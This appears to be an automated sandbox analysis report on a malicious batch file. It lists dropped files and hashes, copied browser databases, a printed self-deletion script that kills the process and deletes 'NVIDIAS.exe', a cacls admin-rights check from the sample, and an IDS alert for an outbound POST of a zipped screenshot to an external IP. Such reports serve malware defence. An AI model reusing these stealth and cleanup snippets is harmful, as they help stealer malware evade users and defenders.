SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vnaa1xe5.m4v.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wwztk3bs.dww.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yvjxs1rv.ilo.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\egk3d2nv.itu

Download File

Process:	C:\ProgramData\QQQ\NVIDIAS.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	15119
Entropy (8bit):	5.63468773874796
Encrypted:	false
SSDEEP:	384:L9iIuERzA83h09RZxeI4bO8y8eIKf+qNV:gIuERzA83h09RZxwO8y8eIKfHNV
MD5:	AFC16C019BBEB3904B37576B9179D9CD
SHA1:	DBA86847FFE7AD2E887F1A51FBD464357850488D
SHA-256:	8EEE2E854F6C97ADB60D3E4F2A7AB51CF1EFC387C672D950E609A4EBA1752748
SHA-512:	752C02768963163D8D20219FEB7A83C2EEAC6C4B5E7F97B035815334B7BB6D327053FA089410BA6D2328B85B9A464F651945F60AD36BD822D1E54E31434C5875
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b

C:\Users\user\AppData\Local\Temp\tmp44B0.tmp.dat

Download File

Process:	C:\ProgramData\QQQ\NVIDIAS.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3036000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08231524779339361
Encrypted:	false
SSDEEP:	12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
MD5:	886A5F9308577FDF19279AA582D0024D
SHA1:	CDCCC11837CDDB657EB0EF6A01202451ECDF4992
SHA-256:	BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
SHA-512:	FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp44B1.tmp.tmpdb

Download File

Process:	C:\ProgramData\QQQ\NVIDIAS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	0.08434615749937499
Encrypted:	false
SSDEEP:	192:2va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vPY:21zkVmvQhyn+Zoz67R
MD5:	93BAA1B7500F3ADB16BE27FCB2E256A8
SHA1:	77CB640557F5F7950B083405B4AEE0573D11D98F
SHA-256:	7C24FE957EFB0DDF026ECDD88027BE5B40863342CF2CF2A5A7FF72062F75B1E9
SHA-512:	C53D09227E5069924E49823CD6E93775B98439D57D279BEEFFE14EA057BF9D9882CE1BC297C0181D0309E027E7993F079D6BF4933A929D2C942903D28DB155AB
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................S`.....z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp44D1.tmp.dat

Download File

Process:	C:\ProgramData\QQQ\NVIDIAS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 27, 1st free page 7, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	57344
Entropy (8bit):	0.7310370201569906
Encrypted:	false
SSDEEP:	96:qsvKLyeymO9K3PlGNxotxPUCbn8MouON3n:q86PlGNxss27e
MD5:	A802F475CA2D00B16F45FEA728F2247C
SHA1:	AF57C02DA108CFA0D7323252126CC87D7B608786
SHA-256:	156ADDC0B949718CF518720E5774557B134CCF769A15E0413ABC257C80E58684
SHA-512:	275704B399A1C236C730F4702B57320BD7F034DC234B7A820452F8C650334233BD6830798446664F133BA4C77AA2F91E66E901CE8A11BD8575C2CD08AB9BE98F
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp44D2.tmp.dat

Download File

Process:	C:\ProgramData\QQQ\NVIDIAS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	1.1414673161713362
Encrypted:	false
SSDEEP:	192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
MD5:	24937DB267D854F3EF5453E2E54EA21B
SHA1:	F519A77A669D9F706D5D537A203B7245368D40CE
SHA-256:	369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
SHA-512:	AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
Malicious:	false
Preview:	SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp44D3.tmp.dat

Download File

Process:	C:\ProgramData\QQQ\NVIDIAS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	1.1414673161713362
Encrypted:	false
SSDEEP:	192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
MD5:	24937DB267D854F3EF5453E2E54EA21B
SHA1:	F519A77A669D9F706D5D537A203B7245368D40CE
SHA-256:	369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
SHA-512:	AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
Malicious:	false
Preview:	SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp44D4.tmp.dat

Download File

Process:	C:\ProgramData\QQQ\NVIDIAS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	1.1414673161713362
Encrypted:	false
SSDEEP:	192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
MD5:	24937DB267D854F3EF5453E2E54EA21B
SHA1:	F519A77A669D9F706D5D537A203B7245368D40CE
SHA-256:	369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
SHA-512:	AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
Malicious:	false
Preview:	SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp44F4.tmp.dat

Download File

Process:	C:\ProgramData\QQQ\NVIDIAS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
Category:	dropped
Size (bytes):	135168
Entropy (8bit):	1.0873605234887023
Encrypted:	false
SSDEEP:	192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
MD5:	5B01CD9FA62FDF35D1A4587F2676CA31
SHA1:	25BBFAC890114F4ECE0BF818F504FFE6102004B8
SHA-256:	74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
SHA-512:	A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
Malicious:	false
Preview:	SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp44F5.tmp.dat

Download File

Process:	C:\ProgramData\QQQ\NVIDIAS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 4, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.86528072116055
Encrypted:	false
SSDEEP:	96:kTN7KLWlGxdKmtZeympbn8MouB6w9f/rrGMa:qVlGxdKN7Iw9fj
MD5:	8CC409C8658C3F05143C1484A1719879
SHA1:	909CDE14664C0E5F943764895E0A9DFEC7831FF5
SHA-256:	BC69C3518DA2ABC8904F314F078D9672BAF3B840E09FD2B2E95D4B07A03A85A4
SHA-512:	55D8923B6481ADF442817B7BAA50C36CBAD8DAC0EC600451813D29F4775DE519A06158A6233E61635CD0ED862E60AC7F50C75556C4E89D583D8A8A4299F1808F
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................v.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp44F6.tmp.dat

Download File

Process:	C:\ProgramData\QQQ\NVIDIAS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
Category:	dropped
Size (bytes):	135168
Entropy (8bit):	1.0873605234887023
Encrypted:	false
SSDEEP:	192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
MD5:	5B01CD9FA62FDF35D1A4587F2676CA31
SHA1:	25BBFAC890114F4ECE0BF818F504FFE6102004B8
SHA-256:	74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
SHA-512:	A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
Malicious:	false
Preview:	SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp44F7.tmp.dat

Download File

Process:	C:\ProgramData\QQQ\NVIDIAS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
Category:	dropped
Size (bytes):	135168
Entropy (8bit):	1.0873605234887023
Encrypted:	false
SSDEEP:	192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
MD5:	5B01CD9FA62FDF35D1A4587F2676CA31
SHA1:	25BBFAC890114F4ECE0BF818F504FFE6102004B8
SHA-256:	74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
SHA-512:	A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
Malicious:	false
Preview:	SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp44F8.tmp.dat

Download File

Process:	C:\ProgramData\QQQ\NVIDIAS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3045002, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.4026573159402624
Encrypted:	false
SSDEEP:	48:TB9aw/aHLopFMavU1/iB8eVC+rQ88TkQqp8JHyDlEKw0esEieNp:1PareMa8K8eVC+rZ8TkQqpWSDlNufp
MD5:	F49DFF163167A43F4940B7337A092C07
SHA1:	1A8BAAC92537FA0BD39063D17C3072AD86190CC4
SHA-256:	B3D38278030DBEA9D1CDDC177F9B6CB590CE1D383A88211B231402B7CA208CF3
SHA-512:	BC7685763D70300FE2AE28803D9F886D91004F6045A995065FAAEB6A9DFCAB77E80B475516E9B4C1F8969E112E2B48C7E68FC2AB15F61BB69443A8C54E24066F
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................v.......@..g.....@....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp6F58.tmp.bat

Download File

Process:	C:\ProgramData\QQQ\NVIDIAS.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	98
Entropy (8bit):	5.152490650406136
Encrypted:	false
SSDEEP:	3:HFTEOuMJcFKsoR9lwBRZDEXEdZkREIk2JSn:yOuMJNR9lwelVk/n
MD5:	355A21B3771C443913048200B4BA6095
SHA1:	BAAA3AA106AA4FD61D7A4C24296C3F8BA48AEDF6
SHA-256:	059B7FB7524CDE4226296B360E370E8F7E7EE69EA4A48566778EB50361068A5B
SHA-512:	0362613FEAE10EE93EDF3AB02CB85F147572FCB48034FC1156F6B18CB19103C674530E8AAA4232A208DC6223566704C822CFBB191A401CC8159E7B277BE7B70E
Malicious:	false
Preview:	chcp 65001..TaskKill /F /IM 716..Timeout /T 2 /Nobreak..Del /ah "C:\ProgramData\QQQ\NVIDIAS.exe"..

C:\Users\user\AppData\Local\Temp\xg3s0jvc.jl2

Download File

Process:	C:\ProgramData\QQQ\NVIDIAS.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	103985
Entropy (8bit):	6.082865991437579
Encrypted:	false
SSDEEP:	1536:QJFxqXOHF+7gFajcCN5tTsxDxEM0pMtwGUFJ526GH1B1WAUt6+1NJsf:QxwOl+V95+xDxLqMtwGU2B1s6+/K
MD5:	6DE273C47E7F54F2910BC516F886633B
SHA1:	230A6D3F3510D1231BCDAD4F4BD843F1575A84A5
SHA-256:	89545282AD73EE9D530E4BACEE9A2046322C767CB7564E8E12694F30CF8CDDEF
SHA-512:	AB5488E0C9622FCC6F4610B0501E79EA87C1963480E8E9F217B46F94E7DDFD32FE0BED9D1329093C58F2D330A49E2D8468CDFD4C6CC8689590671B36F9504617
Malicious:	false
Preview:	{"accessibility":{"screen_ai":{"last_used_time":"13370432463378508"}},"autofill":{"ablation_seed":"f4fbGGU/iY4=","states_data_dir":"C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\AutofillStates\\2020.11.2.164946"},"background_tracing":{"session_state":{"privacy_filter":true,"state":0}},"breadcrumbs":{"enabled":false,"enabled_time":"13369750774825357"},"browser":{"default_browser_infobar_declined_count":1,"default_browser_infobar_last_declined_time":"13370432455860460","default_browser_prompt_refresh_study_group":"enabled-v2-arm-3","last_redirect_origin":"","last_whats_new_version":128,"shortcut_migration_version":"92.0.4515.159","whats_new_hats_activation_threshold":64},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"local":{"password_hash_data_list":[]},"management":{"platform"

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	2359296
Entropy (8bit):	4.361341472416165
Encrypted:	false
SSDEEP:	49152:taAhNXBlw3Ak2BGUi5Dj0Uag6nSz8a8aO:O
MD5:	C6A628A070158FB046C791AB75883B2C
SHA1:	7637211ADD65BC65476A25664D54CC73685D687E
SHA-256:	971C27E1A598D579F59F2589323EF59028B694BC5EF02724BC3B45BBF626A780
SHA-512:	84D15BAA4CC4FD6ED004A7976B5AAE608A6396E0481618CBF18BF48B8027AA310CEB12BE45600D6014EC2A9282AC80CBAD25A9FCE52ACB4AA613E0044A4A23F0
Malicious:	false
Preview:	regf........5.#.^................... .....!.....\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......Q......P..#....Q......P..#........Q......P..#.rmtm..\Q.O..............................................................................................................................................................................................................................................................................................................................................K...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	4.640270911877707
Encrypted:	false
SSDEEP:	768:GqQyP8n92v+SSPAb6aRlLlPFRyFuiruMsfd8dMwLGYSAi1fRFrsJpyG2gKOrndxQ:NdzV9Iuiru7dRFrsJdNYP4egHf
MD5:	543C132816F5CD7D2E394CE36C7B5127
SHA1:	20F664CBED544562464DB22C2A7DE5A63539B3ED
SHA-256:	4C74B3DC409E292609763ED2B77FDBBAF61FC12CDBD51A467640B106B3FB7F5A
SHA-512:	6BC2AA4B1AD929360279A6415892369667AA76EA8804DE94791F4B7EAA38614255C81D740F64FB3FE73DCF91F03419D69E1C4B5CAD7BAA199198572538CF00DD
Malicious:	false
Preview:	regf........5.#.^................... .....!.....\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......Q......P..#....Q......P..#........Q......P..#.rmtm..\Q.O..............................................................................................................................................................................................................................................................................................................................................M...HvLE..............!......X.<.?........d......................... .......p...............................P...............................`... ..........................hbin................5.#.^...........nk,....S....... .......................................................&...{11517B7C-E79D-4e20-961B-75A811715ADD}......nk .....9......(...........@...............................*...N.......)...InventoryMiscellaneousMemorySlotArrayInfo....................mG.....nk .$4./T....... ...

\Device\Null

Download File

Process:	C:\Windows\System32\cacls.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	121
Entropy (8bit):	4.323081947925383
Encrypted:	false
SSDEEP:	3:ohAIQDMCZArMsxo2xRSvFFwIFMW3Gtvn:ohYD+82xmwIyHtv
MD5:	43B1EC1407EA9C0219A563FFFEEAE780
SHA1:	C42041802E99A95E6CBAE13E3E20EBFBA3237BB2
SHA-256:	7E5146BF6F0B6AA61AFD4E3A6031D6DEF0F37523A22D75086B8E0E21D22E4B16
SHA-512:	5307D7E089BEA4DAC250D0B606C80DF13CCA0A7ECB622BF61B37AD736FFC44EA68F9B993E4743F2AB220FF950E9D9B423524D4E10C0B2D1CE280A7D9B5095DE0
Malicious:	false
Preview:	C:\Windows\system32\config\SYSTEM NT AUTHORITY\SYSTEM:F .. BUILTIN\Administrators:F ....

Static File Info

General

File type:	DOS batch file, ASCII text
Entropy (8bit):	5.449927446489964
TrID:
File name:	3gJQoqWpxb.bat
File size:	2'254 bytes
MD5:	3642e29400aac4137d7da517c1a0161b
SHA1:	b538bfc1dc9903ff5766000219cd91f3cf978299
SHA256:	d5033dd57b3a239c426396ffd361a81ad4e37848cb05ff5ac47f3e73555a0a56
SHA512:	d988693b3052a3abe5dd61e8b6937f8df78b335c6533884c383d42d4fd8073cd0b6add131d75816d5e287ae39c41b26a66045a0481105963ffaaba818e5b22a4
SSDEEP:	48:k7Bt7ODpwIp31pT7UV0eFeFFIFxO951oN44bvuE44phurDnmBclsdtl4:o82I9DT/6ebkx0ai4bvur4phuHNwr4
TLSH:	8E41331082EA9239C171FE00964E394BE777F24B6066427353E8210DE48314FDF3E9E9
File Content Preview:	@echo off. IF "%PROCESSOR_ARCHITECTURE%" EQU "amd64" (.>nul 2>&1 "%SYSTEMROOT%\SysWOW64\cacls.exe" "%SYSTEMROOT%\SysWOW64\config\system".) ELSE (.>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system".)..if '%errorlevel%' NEQ

File Icon


Icon Hash:	9686878b929a9886

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-16T17:30:28.130597+0100	2843856	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2	1	192.168.11.20	49710	89.23.100.233	1490	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 16, 2024 17:30:15.874180079 CET	49707	443	192.168.11.20	140.82.113.4
Dec 16, 2024 17:30:15.874202967 CET	443	49707	140.82.113.4	192.168.11.20
Dec 16, 2024 17:30:15.874413967 CET	49707	443	192.168.11.20	140.82.113.4
Dec 16, 2024 17:30:15.882610083 CET	49707	443	192.168.11.20	140.82.113.4
Dec 16, 2024 17:30:15.882616997 CET	443	49707	140.82.113.4	192.168.11.20
Dec 16, 2024 17:30:16.201060057 CET	443	49707	140.82.113.4	192.168.11.20
Dec 16, 2024 17:30:16.201356888 CET	49707	443	192.168.11.20	140.82.113.4
Dec 16, 2024 17:30:16.204150915 CET	49707	443	192.168.11.20	140.82.113.4
Dec 16, 2024 17:30:16.204157114 CET	443	49707	140.82.113.4	192.168.11.20
Dec 16, 2024 17:30:16.204348087 CET	443	49707	140.82.113.4	192.168.11.20
Dec 16, 2024 17:30:16.210202932 CET	49707	443	192.168.11.20	140.82.113.4
Dec 16, 2024 17:30:16.254205942 CET	443	49707	140.82.113.4	192.168.11.20
Dec 16, 2024 17:30:16.660283089 CET	443	49707	140.82.113.4	192.168.11.20
Dec 16, 2024 17:30:16.660332918 CET	443	49707	140.82.113.4	192.168.11.20
Dec 16, 2024 17:30:16.660574913 CET	49707	443	192.168.11.20	140.82.113.4
Dec 16, 2024 17:30:16.660584927 CET	443	49707	140.82.113.4	192.168.11.20
Dec 16, 2024 17:30:16.660798073 CET	49707	443	192.168.11.20	140.82.113.4
Dec 16, 2024 17:30:16.661204100 CET	443	49707	140.82.113.4	192.168.11.20
Dec 16, 2024 17:30:16.661233902 CET	443	49707	140.82.113.4	192.168.11.20
Dec 16, 2024 17:30:16.661396980 CET	49707	443	192.168.11.20	140.82.113.4
Dec 16, 2024 17:30:16.663333893 CET	49707	443	192.168.11.20	140.82.113.4
Dec 16, 2024 17:30:16.800734997 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:16.800750017 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:16.801007986 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:16.801156044 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:16.801166058 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.078299046 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.078507900 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.080884933 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.080893040 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.081077099 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.081945896 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.122205019 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.554456949 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.572547913 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.572556973 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.572716951 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.572726965 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.572823048 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.573046923 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.600054979 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.600064993 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.600291967 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.600425959 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.600431919 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.652070045 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.702647924 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.702651024 CET	443	49708	185.199.108.133	192.168.11.20
